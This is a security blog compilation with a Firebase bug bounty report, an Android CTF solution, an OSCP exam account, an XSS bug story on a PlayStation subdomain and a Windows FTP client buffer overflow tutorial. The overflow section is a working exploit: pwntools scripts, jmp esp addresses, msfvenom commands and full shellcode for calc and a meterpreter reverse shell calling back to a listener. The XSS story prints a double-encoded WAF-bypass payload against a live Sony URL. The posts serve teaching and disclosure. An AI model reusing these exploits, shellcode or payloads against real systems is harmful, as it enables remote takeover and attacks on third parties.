
How I was able to find firebase database takeover vulnerability in a company

Introduction

This is my bug bounty write-up about a Firebase database takeover vulnerability I found in an Android app. There are only a few resources about Android hacking, so this article aims to briefly document one Android vulnerability class, the Firebase database takeover, using my own finding. I will blur some of the company's information. That being said, let's jump in.

Steps To Reproduce

1. Download the application from the Google Play Store.

2. Use an APK extractor to extract the APK.

3. I used the BlueStacks emulator.

4. Use apktool to decompile the application.

5. Go to res/values/strings.xml.

6. Look for the Firebase URL.

7. I wrote a Python script to insert data.

8. PoC (Proof of Concept)

Impact

This application doesn't need any access_token to insert data into the Firebase database. The database is completely open: anybody can access it without any credentials.
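A defender-side check for this class of misconfiguration, added here as an example and not part of the original report: it lints a Realtime Database rules document for unconditional `.read`/`.write` grants and classifies the response to an unauthenticated GET of `/.json` (Firebase answers a locked database with HTTP 401 and `{"error": "Permission denied"}`; a 200 means the rules let anyone read). The two rule sets and the project URL placeholder are constructed for the example, and the probe only issues a GET.

```python
import json
import urllib.error
import urllib.request

# Constructed example rule sets (not the company's actual rules). The first is
# the "completely open" configuration that allows unauthenticated reads and
# writes; the second requires a signed-in user and scopes each user to their
# own subtree.
OPEN_RULES = {"rules": {".read": True, ".write": True}}

LOCKED_RULES = {
    "rules": {
        "users": {
            "$uid": {
                ".read": "auth != null && auth.uid == $uid",
                ".write": "auth != null && auth.uid == $uid",
            }
        }
    }
}


def find_public_rules(rules, path="/"):
    """Walk a Realtime Database rules tree and return (path, rule) pairs whose
    .read or .write rule is unconditionally true. Condition strings such as
    "auth != null" are not flagged; only the literal true / "true" is, because
    such a grant applies to the whole subtree below it."""
    findings = []
    for key, value in rules.items():
        if key in (".read", ".write"):
            if value is True or (isinstance(value, str) and value.strip() == "true"):
                findings.append((path, key))
        elif isinstance(value, dict):
            findings.extend(find_public_rules(value, path.rstrip("/") + "/" + key))
    return findings


def classify_probe(status, body):
    """Interpret the result of an unauthenticated GET of <db>/.json."""
    if status == 200:
        return "open-read"
    if status == 401:
        return "locked"
    try:
        err = json.loads(body).get("error", "")
    except (ValueError, AttributeError):
        err = ""
    return "unknown: %s %s" % (status, err)


def probe_database(base_url, timeout=10):
    """Send the unauthenticated read against a database you operate and
    classify the answer. Only a GET is issued."""
    url = base_url.rstrip("/") + "/.json"
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return classify_probe(resp.status, resp.read().decode())
    except urllib.error.HTTPError as e:
        return classify_probe(e.code, e.read().decode())


if __name__ == "__main__":
    print(find_public_rules(OPEN_RULES["rules"]))    # root is world read/write
    print(find_public_rules(LOCKED_RULES["rules"]))  # nothing flagged
    # Hypothetical project URL; replace with your own database before running.
    # print(probe_database("https://<your-project>.firebaseio.com"))
```

The rules lint is the check to run in CI on the rules file, and the probe is the one-line confirmation from outside: if `/.json` comes back 200 without an `auth` parameter, the database is readable by anyone holding the URL extracted from the APK.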

Timeline

Vulnerability Reported – 15 October, 2020 3:37 AM.

Replied – 15 October, 2020 12:31 PM

Rewarded $100 for two reports – 21 October, 2020 11:21 AM.

Conclusion

I really appreciate the company's very fast reply when I submitted the vulnerability, and that they allowed me to disclose it. I really enjoyed finding bugs in their organization; thanks for agreeing to disclose this report and rewarding me with a bounty.

References

https://medium.com/@danangtriatmaja/firebase-database-takover-b7929bbb62e1

Infosec Mobile CTF Challenge 1

Introduction

Hello, I am Chan. Today I want to write an article about an Android CTF challenge from Infosec Mobile CTF 2018. While learning Android pentesting I noticed there are only a few resources about it, so I want to write more articles about Android pentesting and share my knowledge with the community.

That being said, this article aims to briefly document some techniques and tools involved in the vulnerability assessment of Android applications. For this purpose, we will solve the 1st challenge of the Infosec Mobile CTF and learn mobile pentesting through CTF challenges. Please get the APK from here.

Initial Setup

I am going to use the BlueStacks emulator to solve this challenge. I have already set up the emulator, so I just click on the app and it installs automatically.

Challenge Description

App CTF Challenge 1: The goal behind this challenge is to figure out the username and password that would let the challenger log in successfully. The flag should be "password:username". (ends 4/6)

1. Decompile The Apk

I will use apktool to decompile the apk.

apktool d App1.apk

2. Launch the apk in emulator

3. Convert the APK to a jar file to analyze the source code

I used dex2jar to convert the APK into a jar file.

4. Get the following files

5. Use jd-gui to view the source codes of jar file

We can see that com.ctf.app1 is the package of the APK and there is nothing interesting in BuildConfig.class.

It is pretty obvious that this is an MD5 hashing function.

We saw the MD5 function in the picture above, and now we can see an MD5 string. There is a function called OnClick.

What this function does is: it takes the username and password from the user, concatenates them into one string, hashes it with MD5 and compares the hash to 263c7fa932b26a56ec0ad76b94aff98b.
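To make the weakness concrete, here is an added Python example (mine, not the challenge's code) that re-creates the OnClick check and contrasts it with a server-side verifier. The hash constant is the one quoted above; the hardened functions, their names and the PBKDF2 parameters are my assumptions. It also shows a side effect of concatenating username and password with no separator: different credential pairs produce the same hash.

```python
import hashlib
import hmac
import os

# Hash constant taken from the challenge's OnClick handler as quoted above.
EMBEDDED_MD5 = "263c7fa932b26a56ec0ad76b94aff98b"


def client_hash(username: str, password: str) -> str:
    """The app's transform: md5(username + password), no salt, no separator."""
    return hashlib.md5((username + password).encode()).hexdigest()


def vulnerable_login(username: str, password: str) -> bool:
    """Re-creation of the app's check. Anyone with the APK has the constant,
    and an unsalted MD5 of a short string is recoverable from lookup tables,
    which is exactly what the hashes.com step below relies on."""
    return client_hash(username, password) == EMBEDDED_MD5


# Hardened alternative (added here, not from the challenge): the secret never
# ships in the client; a server holds a per-user random salt and a slow
# PBKDF2-HMAC-SHA256 derivation, and the comparison is constant-time.
PBKDF2_ROUNDS = 200_000  # assumed cost setting for the example


def make_record(password: str) -> dict:
    salt = os.urandom(16)
    key = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS, dklen=32)
    return {"salt": salt, "key": key}


def verify(record: dict, password: str) -> bool:
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), record["salt"], PBKDF2_ROUNDS, dklen=32
    )
    return hmac.compare_digest(candidate, record["key"])


if __name__ == "__main__":
    print(vulnerable_login("admin", "guess"))          # False
    print(client_hash("ad", "min") == client_hash("a", "dmin"))  # True: no separator
    rec = make_record("correct horse")
    print(verify(rec, "correct horse"), verify(rec, "wrong"))   # True False
```

The separator issue is independent of MD5: any `hash(a + b)` construction accepts every split of the same string, so a verifier that must combine fields should length-prefix or delimit them. The real fix for the challenge's design, though, is that no credential-derived constant belongs in the client at all.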

6. Getting the plaintext for the MD5 hash

I used this website https://hashes.com/en/decrypt/hash to look up the MD5 hash.

7. Flag

As mentioned in the challenge description, the flag is the username and password.

Username - admin
Password - [email protected]

8. POC(Proof Of Concept)

After submitting the username and password, we get the smiley face :)

Conclusion

This is my first article about Android pentesting. If you would like to learn more about Android pentest challenges, please keep reading my blog. I will upload more Android pentest challenges and solutions; this is going to be a series on learning Android pentesting through CTF challenges.

If you like this article, please share it on your social media and with your friends.

Keep learning.

Thank you!

Into the OSCP Journey

When people hear OSCP, they think of the exam as a beast or a monster that will tear them apart. Yes, I thought like that in the past, but with proper preparation any beast or exam can be defeated. I took the OSCP exam on 27th August 2020 and passed on 31st August 2020. Today I will share my experience of the OSCP journey.

What is OSCP?

OSCP (Offensive Security Certified Professional) is a well-known certification in cyber security. It is famous for its 100% hands-on exam, which is quite challenging. The exam duration is 24 hours (precisely 23 hours and 45 minutes). In the exam you have to do penetration testing on 5 boxes (5 computer servers), so timing is also very important. If you want details about OSCP, you can google it because I'm not going to explain it in detail.

Preparation

Before doing OSCP, I spent most of my time solving the NetSecFocus OSCP-like machines from VulnHub and HackTheBox. I completed 85% of the machines. Then I decided to purchase the OSCP course on June 27 and got access to the labs and materials on July 5. In 20 days I solved 35 machines from the OSCP labs, including the big 4, which are considered difficult but not as difficult as HackTheBox hard machines :C. Then I worried about my Windows privilege escalation skills and decided to purchase Tib3rius's Windows privilege escalation course, which is really good for beginners. I did that course and went roughly through the TryHackMe OSCP learning path. Then I scheduled my exam for 27th August and relaxed my mind for 5 days before the exam.

NetSecFocus OSCP-like machines list:

https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=0

Tib3rius's Windows privilege escalation course:

https://www.udemy.com/course/windows-privilege-escalation/

TryHackMe OSCP path:

https://tryhackme.com/path/outline/OSCP

Exam Day

I scheduled my exam for 7:30 am. Morning is refreshing and the best time to start. Due to my poor internet connection, I started at 7:50 am. The internet connection is very important for this exam. The exam is proctored: the proctor checked my passport for identification and I had to show around the room and under the desk as they asked. I had to screen-share and allow the proctor access to my webcam, so I recommend checking screen sharing and the webcam before taking the exam. As usual, I ran the scans on all boxes while doing the buffer overflow. Before starting the exam I had started my Windows 7 VirtualBox VM on my Kali for preparation, but it turned out to be very disadvantageous: my laptop was super slow and laggy. I was nervous because of the late start, and Immunity Debugger was very laggy on my machine. Because I was nervous, I made mistakes. I did the buffer overflow patiently and after one and a half hours I got the flag. Then I saw that my masscan did not get any output from one of the machines. I decided to scan it again and then my laptop hung. I had to restart my laptop in a hurry and emailed OSCP support about my problems. I reconnected to the exam panel and told them about my problems. Then I resumed my exam, but sadly I had not saved any scan output. So I decided to scan and do the boxes one after another. At 1:30 pm sharp I had done 4 boxes and decided to get lunch. After lunch, I decided to do the reporting first because I'm bad at reporting and was worried about my screenshots. After checking my report several times I ended my exam. The next morning I submitted my report, and I got my exam result on 31st August. I passed the OSCP exam on my 1st attempt.

Tips on taking OSCP exam

  • Enumeration is the key [ once you get access to the OSCP student forum, I recommend reading the Alpha & Beta write-ups ]
  • Take as many screenshots as you can
  • Practise reporting
  • Practise boxes without write-ups
  • Don't get very nervous if something happens
  • Proper preparation
  • A good laptop, the best internet and a good chair

Good Quotes

  • “Try Harder”
  • “Practice makes perfect”
  • “Every battle is won before it is fought”

Story of Playstation(Sony) XSS

Hello all!!! Today I decided to share my finding of XSS on a subdomain of PlayStation. It was about 1 year ago, I think: I started hunting bugs on Sony websites and first I found directory indexing on these paths:

  • https://blog.latam.playstation.com/wp-content/
  • https://blog.latam.playstation.com/wp/wp-includes/
  • https://blog.us.playstation.com/wp/wp-includes/
  • https://blog.us.playstation.com/wp-content/
  • https://blog.br.playstation.com/wp/wp-includes/
  • https://blog.br.playstation.com/wp-content/
  • https://rd.playstation.com/

Then I reported it to Sony and they didn't accept it because they could not find any impact. I didn't understand why they said that :3 and I was like, okay. Then I tried to dig more into the folders and found this page [ https://blog.latam.playstation.com/wp-content/mu-plugins/fieldmanager/tests/js/index.html ]. I found QUnit 1.21.0 on the page and decided to search for an exploit on Google. Then I found this page.

There are two PoCs, and the 2nd PoC shows that the parameter testId is vulnerable to XSS, so I decided to give it a try. First I injected the payload <svg onload=alert(1)> and the WAF filtered it. Then I fuzzed a lot and at last, boom! Double URL encoding bypassed the WAF.

So the PoC link is [ https://blog.us.playstation.com/wp-content/mu-plugins/fieldmanager/tests/js/index.html?testId=%25%33%63%25%37%33%25%37%36%25%36%37%25%32%30%25%36%66%25%36%65%25%36%63%25%36%66%25%36%31%25%36%34%25%33%64%25%36%31%25%36%63%25%36%35%25%37%32%25%37%34%25%32%38%25%36%34%25%36%66%25%36%33%25%37%35%25%36%64%25%36%35%25%36%65%25%37%34%25%32%65%25%36%34%25%36%66%25%36%64%25%36%31%25%36%39%25%36%65%25%32%39%25%33%65 ].
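Added example, not part of the original post: the filter-side normalization that this bypass defeats, in Python. A WAF that percent-decodes once sees the testId value as still-encoded text containing no angle brackets; decoding until the value stops changing reveals the markup, and the page itself should HTML-escape the parameter before reflecting it. The constant is the testId value from the PoC link above; the function names are mine.

```python
import html
from urllib.parse import unquote

# testId value copied from the PoC link above (double percent-encoded).
POC_PARAM = (
    "%25%33%63%25%37%33%25%37%36%25%36%37%25%32%30%25%36%66%25%36%65%25%36%63"
    "%25%36%66%25%36%31%25%36%34%25%33%64%25%36%31%25%36%63%25%36%35%25%37%32"
    "%25%37%34%25%32%38%25%36%34%25%36%66%25%36%33%25%37%35%25%36%64%25%36%35"
    "%25%36%65%25%37%34%25%32%65%25%36%34%25%36%66%25%36%64%25%36%31%25%36%39"
    "%25%36%65%25%32%39%25%33%65"
)


def decode_until_stable(value: str, max_rounds: int = 5):
    """Percent-decode repeatedly until the string no longer changes.
    Returns (final_text, rounds_needed). A filter that decodes exactly once
    only ever sees the output of round 1."""
    current = value
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
        rounds += 1
    return current, rounds


def looks_like_markup(value: str) -> bool:
    """Deliberately simple signal used by the example filter."""
    return "<" in value or ">" in value


def inspect_param(value: str) -> dict:
    """Compare what a single-decode filter sees with the fully decoded value."""
    single = unquote(value)
    full, rounds = decode_until_stable(value)
    return {
        "single_decode_flagged": looks_like_markup(single),
        "full_decode_flagged": looks_like_markup(full),
        "rounds": rounds,
        "decoded": full,
    }


def safe_reflect(value: str) -> str:
    """What the test page should do with testId before writing it into HTML."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    report = inspect_param(POC_PARAM)
    print(report)               # single decode: not flagged; full decode: flagged after 2 rounds
    print(safe_reflect(report["decoded"]))
```

Normalizing to a fixed point before matching closes the double-encoding gap, but the escape step is the real fix: a filter can only block what it recognizes, whereas output encoding makes the reflected value inert regardless of how it was encoded on the way in.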

Then I reported the bug; they replied after 3 months and rewarded swag that was never shipped to me :V.

That's my story of XSS on PlayStation. Hope you like it. Thanks!!!

Windows Buffer Overflow (32bit ftp)

Today I will show how to exploit a 32-bit Windows buffer overflow. This is my first blog post.

What is a buffer?

Buffers are areas of memory set aside to hold data, often while moving it from one section of a program to another, or between programs.

What is a buffer overflow?

A buffer overflow occurs when a program or process attempts to write more data to a fixed-length block of memory, or buffer, than the buffer is allocated to hold. Since buffers are created to contain a defined amount of data, the extra data can overwrite values in memory addresses adjacent to the destination buffer unless the program includes sufficient bounds checking to flag or discard data when too much is sent to the buffer.

Introduction

There are a lot of tutorials about this 32-bit FTP Windows buffer overflow, but I want to use a more modern approach while exploiting it. Let's start.

Requirements

  • You can download the 32-bit FTP exe file here
  • You can test on any Windows version.
  • Immunity Debugger
  • Pwntools

First you need to load the 32-bit FTP client in Immunity Debugger.

File > Open > select the FTP file and open it.

When I run it via the debugger, it asks me for the FTP server IP and port. So we need to create an FTP server and let the FTP client connect to us. Let's create a simple FTP server using pwntools.

from pwn import *

# Minimal "FTP server": listen on port 21, accept the client's connection
# and send it a 220 banner (the first line an FTP client reads).
l = listen(21)

payload = b"Sent some strings"

_ = l.wait_for_connection()

l.sendline(b"220 " + payload)

sudo python test.py

Important: once you run the debugger, each time you need to restart the debugger by pressing Ctrl+F2 or Debug tab > Restart.

Next step: let's crash the FTP client with a bunch of "A"s.

from pwn import *

l = listen(21)

# 1000 bytes of "A" in the banner: far more than the client's buffer holds
payload = b"A" * 1000

_ = l.wait_for_connection()

l.sendline(b"220 " + payload)

Great! It crashes. When we look at EIP in the debugger, the stack is filled with lots of "A"s (EIP = 41414141).

All of the registers have been overwritten with 41 (hex for "A"). This means we have a buffer overflow vulnerability on our hands and we have proven that we can overwrite EIP. At this point we know that the bytes landing in EIP are somewhere between 1 and 1000 bytes into the buffer, but we don't know exactly where. What we need to do next is figure out exactly where EIP is overwritten (in bytes) and attempt to control it.

The next step is to find the offset. Let's find it.

from pwn import *

l = listen(21)

# cyclic() returns a pattern in which every 4-byte window is unique, so the
# 4 bytes that end up in EIP identify their position in the buffer
payload = cyclic(1000)

_ = l.wait_for_connection()

l.sendline(b"220 " + payload)

Take the EIP value from the debugger (786A6161) and pass it to cyclic_find() to get the offset.

Offset = 989

To execute the shellcode, we need to find the address of a JMP ESP (or CALL ESP) instruction: we place it in EIP so that execution jumps to the address held in ESP, where the rest of our data lands. When you loaded the FTP client in Immunity, you saw that the kernel32.dll module was also loaded, so we use an address from it to reach the shellcode.

!mona jmp -r esp -m kernel

You will see 3 jmp esp addresses and 2 call esp addresses. You can use any of them; all of the addresses work. So let's jump through one of these addresses to the shellcode. First I will execute the calculator. After that I will show how to generate a reverse shell and exploit with it. Let's pop calc.

To generate the calc shellcode using msfvenom:

msfvenom -a x86 --platform windows -p windows/exec cmd=calc.exe -e x86/alpha_mixed -f c -b "\x00"

Note: this FTP client doesn't have any bad characters, so I will not show you how to find bad characters easily and how to avoid them, but I will write about that in another post.

The goal is: Buffer + JMP ESP + NOP sled + shellcode.

Why is a NOP sled part of this exploit?

Some attacks consist of making the program jump to a specific address and continue running from there. The injected code has to be loaded previously somehow in that exact location.

Stack randomization and other runtime differences may make the address where the program will jump impossible to predict, so the attacker places a NOP sled in a big range of memory. If the program jumps to anywhere into the sled, it will run all the remaining NOPs, doing nothing, and then will run the payload code, just next to the sled.

The reason the attacker uses the NOP sled is to make the target address bigger: the code can jump anywhere in the sled, instead of exactly at the beginning of the injected code.

A 128-byte NOP sled is just a group of NOP instructions 128 bytes wide.

NOTE #1: NOP (No-OPeration) is an instruction available in most (all?) architectures that does nothing, other than occupying memory and some runtime.

NOTE #2: in architectures with variable length instructions, a NOP instruction is usually just one byte in length, so it can be used as a convenient instruction padding. Unfortunately, that also makes it easy to do a NOP sled.

Ref : https://stackoverflow.com/questions/14760587/how-does-a-nop-sled-work
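The steps above (crash, offset, return address, payload layout) in one self-contained Python script, added here as an example and not taken from the original post. It needs no pwntools: it generates the same de Bruijn pattern that cyclic() uses, recovers the offset from the EIP value 786A6161 shown above, checks the shellcode for bad characters and assembles buffer + jmp esp + NOP sled + shellcode. The stand-in shellcode (INT3 breakpoints) is constructed for the example; the offset and jmp esp address are the ones quoted in the post.

```python
import itertools
import struct

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"


def de_bruijn(alphabet: bytes = ALPHABET, n: int = 4):
    """Lazily generate the de Bruijn sequence B(k, n) with the FKM algorithm
    (Lyndon words in lexicographic order), the construction pwntools' cyclic()
    is built on. Every n-byte window of the output is unique, which is what lets
    4 bytes read out of EIP identify their position in the buffer."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for i in range(1, p + 1):
                    yield alphabet[a[i]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length: int) -> bytes:
    """First `length` bytes of the pattern (same output as pwntools cyclic)."""
    return bytes(itertools.islice(de_bruijn(), length))


def cyclic_find(value, search_len: int = 4096) -> int:
    """Offset of a 4-byte window in the pattern. Accepts the raw bytes or the
    integer shown in the debugger's EIP, which x86 stored little-endian, so
    0x786a6161 is the bytes b"aajx" in the buffer."""
    if isinstance(value, int):
        value = struct.pack("<I", value)
    return cyclic(search_len).find(value)


def check_badchars(data: bytes, badchars: bytes = b"\x00") -> list:
    """Byte values in `data` that the target would mangle or truncate on.
    The post states this client has none beyond the NUL excluded in msfvenom."""
    return sorted({b for b in data if b in badchars})


def build_payload(offset: int, jmp_esp: int, shellcode: bytes, nop_len: int = 30) -> bytes:
    """Buffer + jmp esp + NOP sled + shellcode, the layout described above."""
    bad = check_badchars(shellcode)
    if bad:
        raise ValueError("shellcode contains bad chars: %r" % bad)
    return b"A" * offset + struct.pack("<I", jmp_esp) + b"\x90" * nop_len + shellcode


if __name__ == "__main__":
    # 0x786A6161 is the EIP value reported in the post after sending cyclic(1000).
    print(cyclic_find(0x786A6161))  # 989, matching the offset found above
    # Constructed stand-in shellcode (INT3 breakpoints), not the msfvenom output.
    payload = build_payload(989, 0x765A3132, b"\xcc" * 8)
    print(len(payload), payload[989:993].hex())
```

The pattern, the offset and the payload assembly are the parts worth understanding rather than calling; sending `b"220 " + payload` from a listener on port 21 is the same step as in the pwntools scripts on this page. Swapping the INT3 stand-in for real shellcode is where `check_badchars()` earns its place: it runs before anything is sent, so an encoder that left a NUL in the output is caught on the attacker's side rather than diagnosed in the debugger.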

Let’s go.

from pwn import *

# 989 bytes of filler reach the saved return address (the offset found above)
payload = b"\x41" * 989

# jmp esp address (in kernel32.dll, found with mona above)
payload += p32(0x765A3132)

# NOP sled, then the msfvenom calc.exe shellcode
payload += b"\x90" * 30
payload += (
    b"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
    b"\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
    b"\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
    b"\x45\x81\x3e\x43\x72\x65\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73"
    b"\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
    b"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x63\x61"
    b"\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53\xff\xd7"
)

l = listen(21)
_ = l.wait_for_connection()

l.sendline(b"220 " + payload)

Okay, calc.exe pops up successfully. Now I will generate reverse-shell shellcode using msfvenom, because I want to control this machine; popping calc isn't enough for me :D...

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.9.255.232 LPORT=4444 -a x86 --platform win -e x86/alpha_mixed -f c -b '\x00'

Put the result in the Python script and run it.

from pwn import *

# same layout as the calc payload: filler up to the return address
payload = b"\x41" * 989

# jmp esp address
payload += p32(0x771F3132)

# NOP sled, then the msfvenom reverse_tcp shellcode
payload += b"\x90" * 30
payload += (
    b"\x89\xe6\xd9\xea\xd9\x76\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
    b"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
    b"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
    b"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
    b"\x59\x6c\x6a\x48\x4b\x32\x75\x50\x43\x30\x73\x30\x65\x30\x6c"
    b"\x49\x6a\x45\x54\x71\x79\x50\x62\x44\x4c\x4b\x66\x30\x70\x30"
    b"\x4e\x6b\x53\x62\x44\x4c\x4c\x4b\x31\x42\x54\x54\x4c\x4b\x63"
    b"\x42\x44\x68\x46\x6f\x4c\x77\x53\x7a\x55\x76\x44\x71\x59\x6f"
    b"\x4c\x6c\x65\x6c\x30\x61\x33\x4c\x46\x62\x46\x4c\x35\x70\x4a"
    b"\x61\x5a\x6f\x56\x6d\x43\x31\x4a\x67\x58\x62\x49\x62\x61\x42"
    b"\x30\x57\x6e\x6b\x62\x72\x42\x30\x6c\x4b\x30\x4a\x67\x4c\x6c"
    b"\x4b\x62\x6c\x66\x71\x30\x78\x49\x73\x57\x38\x46\x61\x5a\x71"
    b"\x72\x71\x6c\x4b\x61\x49\x71\x30\x37\x71\x6b\x63\x6c\x4b\x37"
    b"\x39\x57\x68\x79\x73\x45\x6a\x30\x49\x4c\x4b\x64\x74\x4e\x6b"
    b"\x67\x71\x79\x46\x30\x31\x39\x6f\x6e\x4c\x69\x51\x5a\x6f\x76"
    b"\x6d\x36\x61\x6b\x77\x67\x48\x59\x70\x73\x45\x38\x76\x54\x43"
    b"\x63\x4d\x7a\x58\x45\x6b\x51\x6d\x44\x64\x73\x45\x6d\x34\x46"
    b"\x38\x6e\x6b\x50\x58\x64\x64\x76\x61\x69\x43\x35\x36\x4e\x6b"
    b"\x44\x4c\x62\x6b\x6e\x6b\x52\x78\x75\x4c\x43\x31\x4a\x73\x4c"
    b"\x4b\x47\x74\x6e\x6b\x77\x71\x4e\x30\x4b\x39\x31\x54\x65\x74"
    b"\x55\x74\x43\x6b\x43\x6b\x35\x31\x51\x49\x63\x6a\x50\x51\x4b"
    b"\x4f\x4b\x50\x71\x4f\x51\x4f\x50\x5a\x6c\x4b\x62\x32\x5a\x4b"
    b"\x4e\x6d\x63\x6d\x72\x48\x56\x53\x55\x62\x73\x30\x53\x30\x35"
    b"\x38\x34\x37\x70\x73\x67\x42\x63\x6f\x51\x44\x42\x48\x50\x4c"
    b"\x44\x37\x54\x66\x35\x57\x6e\x69\x58\x68\x69\x6f\x68\x50\x6c"
    b"\x78\x6c\x50\x46\x61\x33\x30\x53\x30\x46\x49\x69\x54\x46\x34"
    b"\x36\x30\x75\x38\x46\x49\x6f\x70\x70\x6b\x35\x50\x4b\x4f\x4b"
    b"\x65\x43\x5a\x46\x6a\x32\x48\x46\x6a\x76\x69\x69\x6f\x58\x68"
    b"\x45\x38\x37\x72\x57\x70\x44\x51\x63\x6c\x6e\x69\x49\x76\x66"
    b"\x30\x72\x70\x42\x70\x56\x30\x37\x30\x56\x30\x57\x30\x32\x70"
    b"\x51\x78\x68\x6a\x64\x4f\x69\x4f\x79\x70\x49\x6f\x49\x45\x7a"
    b"\x37\x72\x4a\x32\x30\x50\x56\x31\x47\x62\x48\x7a\x39\x6d\x75"
    b"\x53\x44\x33\x51\x69\x6f\x79\x45\x4b\x35\x4f\x30\x62\x54\x57"
    b"\x7a\x6b\x4f\x62\x6e\x43\x38\x71\x65\x7a\x4c\x69\x78\x63\x57"
    b"\x65\x50\x65\x50\x33\x30\x43\x5a\x63\x30\x63\x5a\x34\x44\x53"
    b"\x66\x30\x57\x42\x48\x44\x42\x5a\x79\x6b\x78\x31\x4f\x49\x6f"
    b"\x7a\x75\x6e\x63\x79\x68\x63\x30\x53\x4e\x76\x56\x4c\x4b\x55"
    b"\x66\x63\x5a\x47\x30\x65\x38\x63\x30\x34\x50\x55\x50\x35\x50"
    b"\x61\x46\x63\x5a\x73\x30\x33\x58\x53\x68\x6f\x54\x51\x43\x5a"
    b"\x45\x39\x6f\x7a\x75\x4d\x43\x72\x73\x71\x7a\x63\x30\x31\x46"
    b"\x43\x63\x71\x47\x52\x48\x63\x32\x79\x49\x39\x58\x43\x6f\x69"
    b"\x6f\x6b\x65\x4c\x43\x6b\x48\x35\x50\x33\x4d\x65\x78\x52\x78"
    b"\x35\x38\x55\x50\x63\x70\x35\x50\x47\x70\x50\x6a\x77\x70\x70"
    b"\x50\x43\x58\x56\x6b\x36\x4f\x56\x6f\x76\x50\x79\x6f\x49\x45"
    b"\x36\x37\x32\x48\x34\x35\x72\x4e\x42\x6d\x73\x51\x39\x6f\x6a"
    b"\x75\x31\x4e\x33\x6e\x69\x6f\x66\x6c\x66\x44\x44\x4f\x4e\x65"
    b"\x42\x50\x39\x6f\x49\x6f\x69\x6f\x59\x79\x6f\x6b\x6b\x4f\x39"
    b"\x6f\x59\x6f\x56\x61\x6a\x63\x76\x49\x49\x56\x64\x35\x59\x51"
    b"\x69\x53\x6f\x4b\x78\x70\x6c\x75\x6c\x62\x70\x56\x63\x5a\x63"
    b"\x30\x61\x43\x49\x6f\x5a\x75\x41\x41"
)

l = listen(21)
_ = l.wait_for_connection()
l.sendline(b"220 " + payload)

Wait for the connection in another terminal.

Gotcha!!!

Let's take a break!

Exploit development is a long journey. It's endless; we just need to keep running. 😀 😀

If you face any trouble during testing, just ping me.

./ht00lay
